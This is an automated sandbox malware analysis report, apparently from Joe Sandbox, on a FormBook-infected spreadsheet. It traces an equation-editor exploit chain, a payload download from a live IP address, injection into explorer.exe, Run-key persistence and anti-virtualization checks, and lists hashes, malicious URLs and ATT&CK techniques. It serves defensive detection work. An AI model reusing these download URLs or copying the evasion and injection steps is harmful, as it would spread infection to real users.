      Source: C:\Windows\SysWOW64\DpiScaling.exeRDTSC instruction interceptor: First address: 0000000072488604 second address: 000000007248860A instructions: 0x00000000 rdtsc 0x00000002 xor ecx, ecx 0x00000004 add ecx, eax 0x00000006 rdtsc
      Source: C:\Windows\SysWOW64\DpiScaling.exeRDTSC instruction interceptor: First address: 000000007248899E second address: 00000000724889A4 instructions: 0x00000000 rdtsc 0x00000002 xor ecx, ecx 0x00000004 add ecx, eax 0x00000006 rdtsc
      Contains functionality to detect sleep reduction / modificationsShow sources
      Source: C:\Users\Public\Libraries\Zxsdvph\Zxsdvph.exeCode function: 9_2_004412A8
      Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE TID: 1580Thread sleep time: -180000s >= -30000s
      Source: C:\Users\Public\vbc.exe TID: 1256Thread sleep time: -300000s >= -30000s
      Source: C:\Windows\SysWOW64\DpiScaling.exeCode function: 7_2_724888D0 rdtsc
      Source: C:\Users\Public\Libraries\Zxsdvph\Zxsdvph.exeCode function: GetCurrentThreadId,GetCursorPos,WaitForSingleObject,
      Source: C:\Users\Public\Libraries\Zxsdvph\Zxsdvph.exeCode function: 9_2_004412A8
      Source: C:\Windows\SysWOW64\DpiScaling.exeProcess information queried: ProcessInformation
      Source: C:\Users\Public\Libraries\Zxsdvph\Zxsdvph.exeCode function: 9_2_00429DC8 GetSystemInfo,
      Source: C:\Users\Public\Libraries\Zxsdvph\Zxsdvph.exeCode function: 9_2_00409218 FindFirstFileA,FindClose,FileTimeToLocalFileTime,FileTimeToDosDateTime,
      Source: C:\Users\Public\Libraries\Zxsdvph\Zxsdvph.exeCode function: 9_2_00405AA4 GetModuleHandleA,GetProcAddress,lstrcpyn,lstrcpyn,lstrcpyn,FindFirstFileA,FindClose,lstrlen,lstrcpyn,lstrlen,lstrcpyn,
      Source: explorer.exe, 00000008.00000000.688659406.000000000457A000.00000004.00000001.sdmpBinary or memory string: SCSI\DISK&VEN_VMWARE&PROD_VIRTUAL_DISK\5&22BE343F&0&000000
      Source: explorer.exe, 00000008.00000000.636747511.0000000000255000.00000004.00000020.sdmpBinary or memory string: \\?\IDE#CdRomNECVMWar_VMware_SATA_CD01_______________1.00____#6&373888b8&0&1.0.0#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}
      Source: explorer.exe, 00000008.00000000.688659406.000000000457A000.00000004.00000001.sdmpBinary or memory string: IDE\CDROMNECVMWAR_VMWARE_SATA_CD01_______________1.00____\6&373888B8&0&1.0.0
      Source: explorer.exe, 00000008.00000000.646524780.000000000457A000.00000004.00000001.sdmpBinary or memory string: pciide\idechannel\5&12368b4a&0&7ide\cdromnecvmwar_vmware_sata_cd01_______________1.00____\6&373888b8&0&1.0.0acpi\pnp0a05\5cacpi\pnp0a05\25pciide\idech7
      Source: explorer.exe, 00000008.00000000.636828828.000000000029B000.00000004.00000020.sdmpBinary or memory string: IDE\CDROMNECVMWAR_VMWARE_SATA_CD01_______________1.00____\6&373888B8&0&1.0.0*N
      Source: explorer.exe, 00000008.00000000.688904749.00000000045D6000.00000004.00000001.sdmpBinary or memory string: \\?\ide#cdromnecvmwar_vmware_sata_cd01_______________1.00____#6&373888b8&0&1.0.0#{53f56308-b6bf-11d0-94f2-00a0c91efb8b}
      Source: C:\Users\Public\Libraries\Zxsdvph\Zxsdvph.exeCode function: 9_2_0045200C SetErrorMode,GetModuleHandleA,GetProcAddress,LoadLibraryA,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,SetErrorMode,
      Source: C:\Windows\SysWOW64\DpiScaling.exeCode function: 7_2_724888D0 rdtsc
      Source: C:\Windows\SysWOW64\DpiScaling.exeProcess token adjusted: Debug
      Source: C:\Windows\SysWOW64\DpiScaling.exeCode function: 7_2_025A26F8 mov eax, dword ptr fs:[00000030h]
      Source: C:\Windows\SysWOW64\DpiScaling.exeProcess queried: DebugPort
      Source: C:\Windows\SysWOW64\DpiScaling.exeCode function: 7_2_02590048 NtProtectVirtualMemory,LdrInitializeThunk,

      HIPS / PFW / Operating System Protection Evasion:

      barindex
      Maps a DLL or memory area into another processShow sources
      Source: C:\Windows\SysWOW64\DpiScaling.exeSection loaded: unknown target: C:\Windows\explorer.exe protection: execute and read and write
      Queues an APC in another process (thread injection)Show sources
      Source: C:\Windows\SysWOW64\DpiScaling.exeThread APC queued: target process: C:\Windows\explorer.exe
      Modifies the context of a thread in another process (thread injection)Show sources
      Source: C:\Windows\SysWOW64\DpiScaling.exeThread register set: target process: 1764
      Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXEProcess created: C:\Users\Public\vbc.exe 'C:\Users\Public\vbc.exe'
      Source: C:\Users\Public\vbc.exeProcess created: C:\Windows\SysWOW64\DpiScaling.exe C:\Windows\System32\DpiScaling.exe
      Source: DpiScaling.exe, 00000007.00000002.702380384.0000000000C00000.00000002.00020000.sdmp, explorer.exe, 00000008.00000000.637320640.0000000000750000.00000002.00020000.sdmp, Zxsdvph.exe, 00000009.00000002.686095205.0000000000840000.00000002.00020000.sdmpBinary or memory string: Shell_TrayWnd
      Source: explorer.exe, 00000008.00000000.636747511.0000000000255000.00000004.00000020.sdmpBinary or memory string: ProgmanG
      Source: DpiScaling.exe, 00000007.00000002.702380384.0000000000C00000.00000002.00020000.sdmp, explorer.exe, 00000008.00000000.637320640.0000000000750000.00000002.00020000.sdmp, Zxsdvph.exe, 00000009.00000002.686095205.0000000000840000.00000002.00020000.sdmpBinary or memory string: !Progman
      Source: DpiScaling.exe, 00000007.00000002.702380384.0000000000C00000.00000002.00020000.sdmp, explorer.exe, 00000008.00000000.637320640.0000000000750000.00000002.00020000.sdmp, Zxsdvph.exe, 00000009.00000002.686095205.0000000000840000.00000002.00020000.sdmpBinary or memory string: Program Manager<
      Source: C:\Users\Public\Libraries\Zxsdvph\Zxsdvph.exeCode function: GetModuleFileNameA,RegOpenKeyExA,RegOpenKeyExA,RegOpenKeyExA,RegQueryValueExA,RegQueryValueExA,RegCloseKey,lstrcpyn,GetThreadLocale,GetLocaleInfoA,lstrlen,lstrcpyn,LoadLibraryExA,lstrcpyn,LoadLibraryExA,lstrcpyn,LoadLibraryExA,
      Source: C:\Users\Public\Libraries\Zxsdvph\Zxsdvph.exeCode function: GetLocaleInfoA,
      Source: C:\Users\Public\Libraries\Zxsdvph\Zxsdvph.exeCode function: GetLocaleInfoA,
      Source: C:\Users\Public\Libraries\Zxsdvph\Zxsdvph.exeCode function: GetLocaleInfoA,
      Source: C:\Users\Public\Libraries\Zxsdvph\Zxsdvph.exeCode function: GetLocaleInfoA,GetACP,
      Source: C:\Users\Public\Libraries\Zxsdvph\Zxsdvph.exeCode function: lstrcpyn,GetThreadLocale,GetLocaleInfoA,lstrlen,lstrcpyn,LoadLibraryExA,lstrcpyn,LoadLibraryExA,lstrcpyn,LoadLibraryExA,
      Source: C:\Users\Public\Libraries\Zxsdvph\Zxsdvph.exeCode function: 9_2_0040ACD8 GetLocalTime,
      Source: C:\Users\Public\Libraries\Zxsdvph\Zxsdvph.exeCode function: 9_2_00452658 GetVersion,

      Stealing of Sensitive Information:

      barindex
      Yara detected FormBookShow sources
      Source: Yara matchFile source: 00000007.00000002.705537729.0000000072480000.00000040.00000001.sdmp, type: MEMORY
      Source: Yara matchFile source: 00000008.00000002.698473567.00000000042CF000.00000040.00020000.sdmp, type: MEMORY
      Source: Yara matchFile source: 00000008.00000000.658169980.00000000042CF000.00000040.00020000.sdmp, type: MEMORY
      Source: Yara matchFile source: 00000007.00000000.633264807.0000000072480000.00000040.00000001.sdmp, type: MEMORY

      Remote Access Functionality:

      barindex
      Yara detected FormBookShow sources
      Source: Yara matchFile source: 00000007.00000002.705537729.0000000072480000.00000040.00000001.sdmp, type: MEMORY
      Source: Yara matchFile source: 00000008.00000002.698473567.00000000042CF000.00000040.00020000.sdmp, type: MEMORY
      Source: Yara matchFile source: 00000008.00000000.658169980.00000000042CF000.00000040.00020000.sdmp, type: MEMORY
      Source: Yara matchFile source: 00000007.00000000.633264807.0000000072480000.00000040.00000001.sdmp, type: MEMORY

      Mitre Att&ck Matrix

      Initial AccessExecutionPersistencePrivilege EscalationDefense EvasionCredential AccessDiscoveryLateral MovementCollectionExfiltrationCommand and ControlNetwork EffectsRemote Service EffectsImpact
      Valid AccountsNative API1DLL Side-Loading1DLL Side-Loading1Deobfuscate/Decode Files or Information1Input Capture11System Time Discovery1Remote ServicesArchive Collected Data1Exfiltration Over Other Network MediumIngress Tool Transfer12Eavesdrop on Insecure Network CommunicationRemotely Track Device Without AuthorizationModify System Partition
      Default AccountsExploitation for Client Execution13Application Shimming1Application Shimming1Obfuscated Files or Information3LSASS MemoryFile and Directory Discovery2Remote Desktop ProtocolScreen Capture1Exfiltration Over BluetoothEncrypted Channel1Exploit SS7 to Redirect Phone Calls/SMSRemotely Wipe Data Without AuthorizationDevice Lockout
      Domain AccountsAt (Linux)Registry Run Keys / Startup Folder1Process Injection312Software Packing1Security Account ManagerSystem Information Discovery116SMB/Windows Admin SharesInput Capture11Automated ExfiltrationNon-Application Layer Protocol2Exploit SS7 to Track Device LocationObtain Device Cloud BackupsDelete Device Data
      Local AccountsAt (Windows)Logon Script (Mac)Registry Run Keys / Startup Folder1DLL Side-Loading1NTDSSecurity Software Discovery241Distributed Component Object ModelClipboard Data2Scheduled TransferApplication Layer Protocol122SIM Card SwapCarrier Billing Fraud
      Cloud AccountsCronNetwork Logon ScriptNetwork Logon ScriptMasquerading111LSA SecretsVirtualization/Sandbox Evasion2SSHKeyloggingData Transfer Size LimitsFallback ChannelsManipulate Device CommunicationManipulate App Store Rankings or Ratings
      Replication Through Removable MediaLaunchdRc.commonRc.commonModify Registry1Cached Domain CredentialsProcess Discovery2VNCGUI Input CaptureExfiltration Over C2 ChannelMultiband CommunicationJamming or Denial of ServiceAbuse Accessibility Features
      External Remote ServicesScheduled TaskStartup ItemsStartup ItemsVirtualization/Sandbox Evasion2DCSyncApplication Window Discovery11Windows Remote ManagementWeb Portal CaptureExfiltration Over Alternative ProtocolCommonly Used PortRogue Wi-Fi Access PointsData Encrypted for Impact
      Drive-by CompromiseCommand and Scripting InterpreterScheduled Task/JobScheduled Task/JobProcess Injection312Proc FilesystemRemote System Discovery1Shared WebrootCredential API HookingExfiltration Over Symmetric Encrypted Non-C2 ProtocolApplication Layer ProtocolDowngrade to Insecure ProtocolsGenerate Fraudulent Advertising Revenue

      Behavior Graph

      Hide Legend

      Legend:

      • Process
      • Signature
      • Created File
      • DNS/IP Info
      • Is Dropped
      • Is Windows Process
      • Number of created Registry Values
      • Number of created Files
      • Visual Basic
      • Delphi
      • Java
      • .Net C# or VB.NET
      • C, C++ or other language
      • Is malicious
      • Internet
      behaviorgraph top1 dnsIp2 2 Behavior Graph ID: 502159 Sample: Swift.xlsx Startdate: 13/10/2021 Architecture: WINDOWS Score: 100 41 onedrive.live.com 2->41 43 hqpyda.bl.files.1drv.com 2->43 45 bl-files.fe.1drv.com 2->45 49 Found malware configuration 2->49 51 Malicious sample detected (through community Yara rule) 2->51 53 Yara detected FormBook 2->53 55 8 other signatures 2->55 10 EQNEDT32.EXE 12 2->10         started        15 EXCEL.EXE 33 27 2->15         started        signatures3 process4 dnsIp5 47 192.3.222.155, 49167, 80 AS-COLOCROSSINGUS United States 10->47 31 C:\Users\user\AppData\Local\...\vbc[1].exe, PE32 10->31 dropped 33 C:\Users\Public\vbc.exe, PE32 10->33 dropped 67 Office equation editor starts processes (likely CVE 2017-11882 or CVE-2018-0802) 10->67 17 vbc.exe 1 16 10->17         started        file6 signatures7 process8 dnsIp9 35 onedrive.live.com 17->35 37 hqpyda.bl.files.1drv.com 17->37 39 bl-files.fe.1drv.com 17->39 29 C:\Users\Public\Libraries\...\Zxsdvph.exe, PE32 17->29 dropped 21 DpiScaling.exe 17->21         started        file10 process11 signatures12 57 Modifies the context of a thread in another process (thread injection) 21->57 59 Maps a DLL or memory area into another process 21->59 61 Tries to detect virtualization through RDTSC time measurements 21->61 63 Queues an APC in another process (thread injection) 21->63 24 explorer.exe 3 2 21->24 injected process13 process14 26 Zxsdvph.exe 24->26         started        signatures15 65 Contains functionality to detect sleep reduction / modifications 26->65

      Screenshots

      Thumbnails

      This section contains all screenshots as thumbnails, including those not shown in the slideshow.

      windows-stand

      Antivirus, Machine Learning and Genetic Malware Detection

      Initial Sample

      No Antivirus matches

      Dropped Files

      No Antivirus matches

      Unpacked PE Files

      SourceDetectionScannerLabelLinkDownload
      7.0.DpiScaling.exe.72480000.0.unpack100%AviraTR/Crypt.ZPACK.GenDownload File
      9.2.Zxsdvph.exe.400000.0.unpack100%AviraHEUR/AGEN.1131223Download File
      7.2.DpiScaling.exe.72480000.5.unpack100%AviraTR/Crypt.ZPACK.GenDownload File

      Domains

      No Antivirus matches

      URLs

      SourceDetectionScannerLabelLink
      http://java.sun.com0%VirustotalBrowse
      http://java.sun.com0%Avira URL Cloudsafe
      http://www.icra.org/vocabulary/.0%URL Reputationsafe
      http://wellformedweb.org/CommentAPI/0%URL Reputationsafe
      http://192.3.222.155/008008/vbc.exe0%Avira URL Cloudsafe
      http://www.iis.fhg.de/audioPA0%URL Reputationsafe
      http://computername/printers/printername/.printer0%Avira URL Cloudsafe
      http://www.%s.comPA0%URL Reputationsafe
      www.septemberstockevent200.com/ht08/0%Avira URL Cloudsafe
      http://java.w0%Avira URL Cloudsafe
      http://windowsmedia.com/redir/services.asp?WMPFriendly=true0%URL Reputationsafe
      http://treyresearch.net0%URL Reputationsafe
      http://servername/isapibackend.dll0%Avira URL Cloudsafe

      Domains and IPs

      Contacted Domains

      NameIPActiveMaliciousAntivirus DetectionReputation
      hqpyda.bl.files.1drv.com
      unknown
      unknownfalse
        high
        onedrive.live.com
        unknown
        unknownfalse
          high

          Contacted URLs

          NameMaliciousAntivirus DetectionReputation
          http://192.3.222.155/008008/vbc.exetrue
          • Avira URL Cloud: safe
          unknown
          www.septemberstockevent200.com/ht08/true
          • Avira URL Cloud: safe
          low

          URLs from Memory and Binaries

          NameSourceMaliciousAntivirus DetectionReputation
          http://services.msn.com/svcs/oe/certpage.asp?name=%s&email=%s&&Checkexplorer.exe, 00000008.00000002.696339073.0000000002CC7000.00000002.00020000.sdmpfalse
            high
            http://www.windows.com/pctv.explorer.exe, 00000008.00000002.696039794.0000000002AE0000.00000002.00020000.sdmpfalse
              high
              http://java.sun.comexplorer.exe, 00000008.00000000.636747511.0000000000255000.00000004.00000020.sdmpfalse
              • 0%, Virustotal, Browse
              • Avira URL Cloud: safe
              unknown
              http://investor.msn.comexplorer.exe, 00000008.00000002.696039794.0000000002AE0000.00000002.00020000.sdmpfalse
                high
                http://www.msnbc.com/news/ticker.txtexplorer.exe, 00000008.00000002.696039794.0000000002AE0000.00000002.00020000.sdmpfalse
                  high
                  http://www.icra.org/vocabulary/.explorer.exe, 00000008.00000002.696339073.0000000002CC7000.00000002.00020000.sdmpfalse
                  • URL Reputation: safe
                  unknown
                  http://schemas.xmlsoap.org/ws/2004/08/addressing/role/anonymous.explorer.exe, 00000008.00000000.637889890.0000000001BE0000.00000002.00020000.sdmpfalse
                    high
                    http://wellformedweb.org/CommentAPI/DpiScaling.exe, 00000007.00000002.702517793.0000000002000000.00000002.00020000.sdmp, explorer.exe, 00000008.00000000.658976324.0000000004650000.00000002.00020000.sdmpfalse
                    • URL Reputation: safe
                    unknown
                    http://www.piriform.com/ccleanerhttp://www.piriform.com/ccleanervexplorer.exe, 00000008.00000000.666365294.0000000008427000.00000004.00000001.sdmpfalse
                      high
                      http://investor.msn.com/explorer.exe, 00000008.00000002.696039794.0000000002AE0000.00000002.00020000.sdmpfalse
                        high
                        http://www.iis.fhg.de/audioPAexplorer.exe, 00000008.00000000.658976324.0000000004650000.00000002.00020000.sdmpfalse
                        • URL Reputation: safe
                        unknown
                        http://www.piriform.com/ccleanerexplorer.exe, 00000008.00000000.666365294.0000000008427000.00000004.00000001.sdmpfalse
                          high
                          http://computername/printers/printername/.printerDpiScaling.exe, 00000007.00000002.702517793.0000000002000000.00000002.00020000.sdmp, explorer.exe, 00000008.00000000.658976324.0000000004650000.00000002.00020000.sdmpfalse
                          • Avira URL Cloud: safe
                          low
                          http://www.%s.comPAexplorer.exe, 00000008.00000000.637889890.0000000001BE0000.00000002.00020000.sdmpfalse
                          • URL Reputation: safe
                          low
                          http://www.autoitscript.com/autoit3explorer.exe, 00000008.00000000.636747511.0000000000255000.00000004.00000020.sdmpfalse
                            high
                            http://java.wexplorer.exe, 00000008.00000000.666365294.0000000008427000.00000004.00000001.sdmpfalse
                            • Avira URL Cloud: safe
                            unknown
                            https://support.mozilla.orgexplorer.exe, 00000008.00000000.636747511.0000000000255000.00000004.00000020.sdmpfalse
                              high
                              http://windowsmedia.com/redir/services.asp?WMPFriendly=trueexplorer.exe, 00000008.00000002.696339073.0000000002CC7000.00000002.00020000.sdmpfalse
                              • URL Reputation: safe
                              unknown
                              http://www.hotmail.com/oeexplorer.exe, 00000008.00000002.696039794.0000000002AE0000.00000002.00020000.sdmpfalse
                                high
                                http://treyresearch.netDpiScaling.exe, 00000007.00000002.702517793.0000000002000000.00000002.00020000.sdmp, explorer.exe, 00000008.00000000.658976324.0000000004650000.00000002.00020000.sdmpfalse
                                • URL Reputation: safe
                                unknown
                                http://servername/isapibackend.dllexplorer.exe, 00000008.00000000.687535121.0000000003E50000.00000002.00020000.sdmpfalse
                                • Avira URL Cloud: safe
                                low

                                Contacted IPs

                                • No. of IPs < 25%
                                • 25% < No. of IPs < 50%
                                • 50% < No. of IPs < 75%
                                • 75% < No. of IPs

                                Public

                                IPDomainCountryFlagASNASN NameMalicious
                                192.3.222.155
                                unknownUnited States
                                36352AS-COLOCROSSINGUStrue

                                General Information

                                Joe Sandbox Version:33.0.0 White Diamond
                                Analysis ID:502159
                                Start date:13.10.2021
                                Start time:17:04:08
                                Joe Sandbox Product:CloudBasic
                                Overall analysis duration:0h 11m 15s
                                Hypervisor based Inspection enabled:false
                                Report type:light
                                Sample file name:Swift.xlsx
                                Cookbook file name:defaultwindowsofficecookbook.jbs
                                Analysis system description:Windows 7 x64 SP1 with Office 2010 SP1 (IE 11, FF52, Chrome 57, Adobe Reader DC 15, Flash 25.0.0.127, Java 8 Update 121, .NET 4.6.2)
                                Number of analysed new started processes analysed:9
                                Number of new started drivers analysed:0
                                Number of existing processes analysed:0
                                Number of existing drivers analysed:0
                                Number of injected processes analysed:0
                                Technologies:
                                • HCA enabled
                                • EGA enabled
                                • HDC enabled
                                • AMSI enabled
                                Analysis Mode:default
                                Analysis stop reason:Timeout
                                Detection:MAL
                                Classification:mal100.troj.expl.evad.winXLSX@8/21@6/1
                                EGA Information:Failed
                                HDC Information:
                                • Successful, ratio: 54.1% (good quality ratio 52.4%)
                                • Quality average: 79.6%
                                • Quality standard deviation: 26.9%
                                HCA Information:
                                • Successful, ratio: 61%
                                • Number of executed functions: 0
                                • Number of non-executed functions: 0
                                Cookbook Comments:
                                • Adjust boot time
                                • Enable AMSI
                                • Found application associated with file extension: .xlsx
                                • Found Word or Excel or PowerPoint or XPS Viewer
                                • Attach to Office via COM
                                • Scroll down
                                • Close Viewer
                                Warnings:
                                Show All
                                • Exclude process from analysis (whitelisted): dllhost.exe, WMIADAP.exe
                                • TCP Packets have been reduced to 100
                                • Excluded IPs from analysis (whitelisted): 13.107.43.13, 13.107.42.12, 13.107.42.13
                                • Excluded domains from analysis (whitelisted): l-0004.l-msedge.net, odc-web-brs.onedrive.akadns.net, odwebpl.trafficmanager.net.l-0004.dc-msedge.net.l-0004.l-msedge.net, l-0003.l-msedge.net, odc-web-geo.onedrive.akadns.net, bl-files.ha.1drv.com.l-0003.dc-msedge.net.l-0003.l-msedge.net, odc-bl-files-brs.onedrive.akadns.net, odc-bl-files-geo.onedrive.akadns.net, l-0004.dc-msedge.net
                                • Report size getting too big, too many NtOpenKeyEx calls found.
                                • Report size getting too big, too many NtQueryValueKey calls found.

                                Simulations

                                Behavior and APIs

                                TimeTypeDescription
                                17:04:43API Interceptor85x Sleep call for process: EQNEDT32.EXE modified
                                17:05:57API Interceptor124x Sleep call for process: vbc.exe modified
                                17:06:05API Interceptor3x Sleep call for process: DpiScaling.exe modified
                                17:06:07AutostartRun: HKCU\Software\Microsoft\Windows\CurrentVersion\Run Zxsdvph C:\Users\Public\Libraries\hpvdsxZ.url
                                17:06:08API Interceptor100x Sleep call for process: explorer.exe modified
                                17:06:16AutostartRun: HKCU64\Software\Microsoft\Windows\CurrentVersion\Run Zxsdvph C:\Users\Public\Libraries\hpvdsxZ.url

                                Joe Sandbox View / Context

                                IPs

                                No context

                                Domains

                                No context

                                ASN

                                MatchAssociated Sample Name / URLSHA 256DetectionLinkContext
                                AS-COLOCROSSINGUSojZRw3eBpNGet hashmaliciousBrowse
                                • 107.172.24.165
                                yEumlkJuVEGet hashmaliciousBrowse
                                • 107.173.176.7
                                DHL consignment number_600595460.xlsxGet hashmaliciousBrowse
                                • 198.12.84.79
                                4f0PBbcOBIGet hashmaliciousBrowse
                                • 107.173.176.7
                                IdXkXl1i9rGet hashmaliciousBrowse
                                • 107.173.176.7
                                RlypFfB7n8Get hashmaliciousBrowse
                                • 107.173.176.7
                                7iw4z5I41wGet hashmaliciousBrowse
                                • 107.173.176.7
                                6wfKGbEfZNGet hashmaliciousBrowse
                                • 107.173.176.7
                                Invoice_Charge.xlsxGet hashmaliciousBrowse
                                • 192.227.158.101
                                090900 Quotation - Urgent.xlsxGet hashmaliciousBrowse
                                • 107.172.13.131
                                Contract.xlsxGet hashmaliciousBrowse
                                • 192.3.122.140
                                REF_MIDLGB34.xlsxGet hashmaliciousBrowse
                                • 23.94.159.208
                                PO08485.xlsxGet hashmaliciousBrowse
                                • 107.172.13.137
                                lod1.xlsxGet hashmaliciousBrowse
                                • 192.3.122.140
                                Invoice Charge.xlsxGet hashmaliciousBrowse
                                • 192.227.158.101
                                TransportLabel_1189160070.xlsxGet hashmaliciousBrowse
                                • 192.3.110.172
                                Nuevo pedido de consulta cotizacin.xlsxGet hashmaliciousBrowse
                                • 192.3.13.95
                                Payment_List.xlsxGet hashmaliciousBrowse
                                • 107.172.73.191
                                REQUEST FOR OFFER 12-10-2021.xlsxGet hashmaliciousBrowse
                                • 192.3.13.11
                                listed destinations.xlsxGet hashmaliciousBrowse
                                • 107.172.73.191

                                JA3 Fingerprints

                                No context

                                Dropped Files

                                No context

                                Created / dropped Files

                                C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\5JC0A1KN\Zxsdvphcjqafchepqbzkmcuuxncavgi[1]
                                Process:C:\Users\Public\vbc.exe
                                File Type:data
                                Category:downloaded
                                Size (bytes):283648
                                Entropy (8bit):7.995115183379276
                                Encrypted:true
                                SSDEEP:6144:kbRih06RY9HgIU6kWhhxTE+duyRvxu8TXVIipNEl+yRDz16w:kbV6S9HgfRMTqyw8ZIipNEJF1f
                                MD5:53F221DDB7579A8E507E321ECF3708E9
                                SHA1:1DBA52E74B99A3B5168C60C56198C5BA6FEBB0F5
                                SHA-256:D8BE7A5A708F32C4EA7144081EF5F48D95C2F611F0C1224DAAD8211A95A48E1B
                                SHA-512:FB1EC9E3D4B4D726153D247E0F6AC600716FDD7882240A9971CFD388B9D7C981A6F224FB8D9B373CB3A1CAEBC8C26F7DA390152283B40092F692D152D2D1B476
                                Malicious:false
                                Reputation:low
                                IE Cache URL:https://hqpyda.bl.files.1drv.com/y4mRb80zT4MmCWKR90qGE-mduUvM9xXJnPMC6NLwMgoSnGtkryGuu1yCC3ty6JRPR4pc7f57Fq15iid421o3jIQHqVM0AgPPo_DSJkv2uQFXLhpioaelpoVnYkLeSTdEPG_xrxSVd_dCmSvpBHCa-Mk3fMnpqbJzSBQWevfN3FRiXmhlJhz8-lRoklD0oeocwR_XeBpinzKoPzTgM4KIsI6Rw/Zxsdvphcjqafchepqbzkmcuuxncavgi?download&psid=1
                                Preview: ...2z.....d.M..*m.......L5.8.5..6....M....7.Z..._cw S]b....).....T.....4....o...$X....*m.......L5.8.5..6....M....7.Z..._cw S]b....).....T.....4....o...$X....*m.......L5.8.5..6....M....7.Z..._cw S]b....).....T.....4....o...$X....*m.......L5.8.5..6....M....7.Z..._cw S]b....).....T.....4....o...$X....*m.......L5.8.5..6....M....7.Z..._cw S]b....).....T.....4....o...$X....*m.......L5.8.5..6....M....7.Z..._cw S]b....).....x......}...T.BT..P.n.k..X....c..."OT...'.v....G..<.cgn.R.X........u.8..>5..{....wT.I....#......{..........).H t...wT.I....#......{..........&N.n..+..u.U"OT..t..X.....X....u.8..1.)..@.6(t..k...L(u...*.r.~.uu;.....7`X.i..F...|......$..n.=....."..9../s..1`p..Q.].[....j.... ..A.)w ....m.D..".+)3$..G....Y...Pt7X..t_..H..vlJ.w.E5NE ..../S.....7....[..l.*...k.w'.P2..Ez.5ji..v.F.&.j<..}.\v/...{..=..:.Y].k.....H..r..I:..}......J...W.y. .XRD..J....]...o....<.w..W...5.....W.i.a..u...K%Q.`p.B..-y....p..
                                C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\ZAE7RW1P\vbc[1].exe
                                Process:C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE
                                File Type:PE32 executable (GUI) Intel 80386, for MS Windows
                                Category:downloaded
                                Size (bytes):1014784
                                Entropy (8bit):6.809458920712055
                                Encrypted:false
                                SSDEEP:12288:GrHeuodar6Dd3m4aS9FCZXhGiX1d0uVrLGaDOdJ4NUTj94rv4lprmi:GDe0W1m4aVNTc9jOij2rqpm
                                MD5:A65B1815177EF9EBA7E5E894BBF65A3C
                                SHA1:5459ECF044E62BFB53220D0E78A5B98C24F17E25
                                SHA-256:298D542746DFA4922DD5FBC8FAB572BE58447C9DBD1481C55BD2254BB275684F
                                SHA-512:0F05D5E05D51FBE5289330CA2C5486C49369728005C6D19B548D3F419FBF52F25AA50007271B315636AEDB311A43485989E4F6DE8154869D0AC7AFFB0F0E3DB1
                                Malicious:true
                                Reputation:low
                                IE Cache URL:http://192.3.222.155/008008/vbc.exe
                                Preview: MZP.....................@...............................................!..L.!..This program must be run under Win32..$7........................................................................................................................................PE..L....^B*............................,.............@..............................................@..............................`'........................... ......................................................................................CODE................................ ..`DATA....d...........................@...BSS......................................idata..`'.......(..................@....tls....@................................rdata..............................@..P.reloc....... ......................@..P.rsrc...............................@..P.....................|..............@..P........................................................................................................................................
                                C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.MSO\1D9161B0.png
                                Process:C:\Program Files\Microsoft Office\Office14\EXCEL.EXE
                                File Type:PNG image data, 413 x 220, 8-bit/color RGBA, non-interlaced
                                Category:dropped
                                Size (bytes):10202
                                Entropy (8bit):7.870143202588524
                                Encrypted:false
                                SSDEEP:192:hxKBFo46X6nPHvGePo6ylZ+c5xlYYY5spgpb75DBcld7jcnM5b:b740IylZ+c5xlYF5Sgd7tBednd
                                MD5:66EF10508ED9AE9871D59F267FBE15AA
                                SHA1:E40FDB09F7FDA69BD95249A76D06371A851F44A6
                                SHA-256:461BABBDFFDCC6F4CD3E3C2C97B50DDAC4800B90DDBA35F1E00E16C149A006FD
                                SHA-512:678656042ECF52DAE4132E3708A6916A3D040184C162DF74B78C8832133BCD3B084A7D03AC43179D71AD9513AD27F42DC788BCBEE2ACF6FF5E7FEB5C3648B305
                                Malicious:false
                                Reputation:moderate, very likely benign file
                                Preview: .PNG........IHDR...............|.....sRGB.........gAMA......a.....pHYs..........o.d..'oIDATx^.k...u.D.R.b\J"Y.*.".d.|pq..2.r,.U.#.)F.K.n.).JI)."....T.....!.....`/H. ...\<...K...DQ"..]..(RI..>.s..t..w.>..U....>.....s/....1./^..p..........Z.H3.y..:..<..........[...@[.........Z.`E....Y:{.,.<y..x....O..................M....M........:..tx..*..........'o..kh.0./.3.7.V...@t........x......~...A.?w....@...A]h.0./.N..^,h......D.....M..B..a}a.a.i.m...D.....M..B..a}a.a.........A]h.0.....P41..-........&.!...!.x......(.......e..a :.+.|.Ut.U_..........2un......F7[.z.?...&..qF}.}..]I...+..J.w.~Aw....V..-.....B, W.5..P.y....>[.....q.t.6U<..@.....qE9.nT.u...`..AY.?...Z<.D.t...HT..A.....8.)..M...k\...v...`..A..?.N.Z<.D.t.Htn.O.sO...0..wF...W.#H...!p....h...|.V+Kws2/......W*....Q.,...8X.)c...M..H.|.h.0....R...Mg!...B...x..;....Q..5........m.;.Q./9..e"{Y.P..1x...FB!....C.G.......41.........@t@W......B/.n.b...w..d....k'E..&..%l.4SBt.E?..m...eb*?.....@.....a :.+H...Rh..
                                C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.MSO\2930BD79.png
                                Process:C:\Program Files\Microsoft Office\Office14\EXCEL.EXE
                                File Type:PNG image data, 458 x 211, 8-bit/color RGB, non-interlaced
                                Category:dropped
                                Size (bytes):11303
                                Entropy (8bit):7.909402464702408
                                Encrypted:false
                                SSDEEP:192:O64BSHRaEbPRI3iLtF0bLLbEXavJkkTx5QpBAenGIC1bOgjBS6UUijBswpJuaUSt:ODy31IAj0bL/EKvJkVFgFg6UUijOmJJN
                                MD5:9513E5EF8DDC8B0D9C23C4DFD4AEECA2
                                SHA1:E7FC283A9529AA61F612EC568F836295F943C8EC
                                SHA-256:88A52F8A0BDE5931DB11729D197431148EE9223B2625D8016AEF0B1A510EFF4C
                                SHA-512:81D1FE0F43FE334FFF857062BAD1DFAE213EED860D5B2DD19D1D6875ACDF3FC6AB82A43E46ECB54772D31B713F07A443C54030C4856FC4842B4C31269F61346D
                                Malicious:false
